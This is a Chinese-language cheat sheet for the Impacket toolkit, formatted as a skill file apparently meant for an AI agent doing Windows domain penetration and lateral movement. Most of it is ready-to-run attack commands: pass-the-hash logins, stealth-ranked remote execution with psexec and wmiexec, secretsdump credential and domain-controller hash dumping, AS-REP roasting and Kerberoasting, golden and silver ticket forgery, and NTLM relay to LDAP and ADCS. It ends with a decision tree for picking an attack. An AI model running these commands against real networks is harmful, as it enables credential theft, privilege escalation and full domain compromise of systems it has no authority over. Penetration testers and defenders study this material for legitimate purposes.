| name | impacket-toolkit |
| description | Impacket Windows 协议工具集。当需要通过 SMB/Kerberos/WMI/DCOM/MSSQL 等 Windows 协议进行远程操作时使用。覆盖 secretsdump 凭据导出、psexec/wmiexec 远程执行、Kerberos 攻击、NTLM 中继,是域渗透和 Windows 横向移动的基础工具集 |
| metadata | {"tags":"impacket,secretsdump,psexec,wmiexec,smbexec,dcomexec,ntlmrelayx,kerberos,smb,windows,域,横向移动,凭据,GetNPUsers,GetUserSPNs","category":"tool"} |
Impacket Windows 协议工具集
Impacket 用纯 Python 实现了 Windows 网络协议栈,在 Linux 上就能直接操作 Windows 目标——不需要在目标上安装任何东西。
项目地址:https://github.com/fortra/impacket
认证方式
Impacket 所有工具都支持多种认证方式,理解这些格式很重要:
tool.py DOMAIN/user:password@TARGET
tool.py DOMAIN/user@TARGET -hashes LM:NTLM
tool.py DOMAIN/user@TARGET -hashes :NTLM
export KRB5CCNAME=/tmp/user.ccache
tool.py DOMAIN/user@TARGET -k -no-pass
tool.py ./administrator:password@TARGET
远程命令执行
从无交互到全交互,选最稳定的:
psexec.py DOMAIN/admin:password@TARGET
psexec.py DOMAIN/admin@TARGET -hashes :NTLM_HASH
smbexec.py DOMAIN/admin:password@TARGET
wmiexec.py DOMAIN/admin:password@TARGET
dcomexec.py DOMAIN/admin:password@TARGET
atexec.py DOMAIN/admin:password@TARGET "whoami"
选择建议
| 工具 | 协议 | 端口 | 隐蔽性 | 交互式 |
|---|
| wmiexec | WMI/DCOM | 135 | ⭐⭐⭐ | ✅ |
| smbexec | SMB | 445 | ⭐⭐ | ✅ |
| psexec | SMB | 445 | ⭐ | ✅ |
| atexec | 任务计划 | 445 | ⭐⭐ | ❌ |
| dcomexec | DCOM | 135 | ⭐⭐ | ✅ |
凭据导出
secretsdump.py DOMAIN/admin:password@TARGET
secretsdump.py DOMAIN/admin@TARGET -hashes :NTLM_HASH
secretsdump.py DOMAIN/admin:password@DC_IP -just-dc
secretsdump.py DOMAIN/admin:password@DC_IP -just-dc-ntlm
secretsdump.py -sam SAM -system SYSTEM LOCAL
Kerberos 攻击
GetNPUsers.py DOMAIN/ -usersfile users.txt -no-pass -dc-ip DC_IP -format hashcat
GetUserSPNs.py DOMAIN/user:password -dc-ip DC_IP -request
getTGT.py DOMAIN/user:password -dc-ip DC_IP
getST.py DOMAIN/svc_account:password -spn cifs/TARGET -impersonate administrator -dc-ip DC_IP
ticketer.py -nthash SERVICE_NTLM -domain-sid S-1-5-21-... -domain DOMAIN -spn cifs/TARGET user
ticketer.py -nthash KRBTGT_NTLM -domain-sid S-1-5-21-... -domain DOMAIN -extra-sid S-1-5-21-PARENT-519 user
枚举工具
lookupsid.py DOMAIN/user:password@TARGET
rpcdump.py DOMAIN/user:password@TARGET
samrdump.py DOMAIN/user:password@TARGET
reg.py DOMAIN/admin:password@TARGET query -keyName HKLM\\SOFTWARE
NTLM 中继
ntlmrelayx.py -t smb://TARGET -smb2support
ntlmrelayx.py -t smb://TARGET -smb2support -c "whoami"
ntlmrelayx.py -t ldap://DC_IP --escalate-user user
ntlmrelayx.py -t http://CA/certsrv/certfnsh.asp --adcs --template DomainController
SMB 文件操作
smbclient.py DOMAIN/user:password@TARGET
smbclient.py DOMAIN/user:password@TARGET -list
smbclient.py DOMAIN/user:password@TARGET
决策树
需要做什么 Windows 操作?
├─ 远程执行命令 → wmiexec(隐蔽)/ psexec(稳定)
├─ 导出凭据/哈希 → secretsdump
├─ Kerberos 攻击 → GetNPUsers / GetUserSPNs
├─ NTLM 中继 → ntlmrelayx + Responder
├─ 文件操作 → smbclient
├─ 有密码 → 直接用 user:password
├─ 有 NTLM 哈希 → -hashes :NTLM(PTH)
└─ 有 Kerberos 票据 → -k -no-pass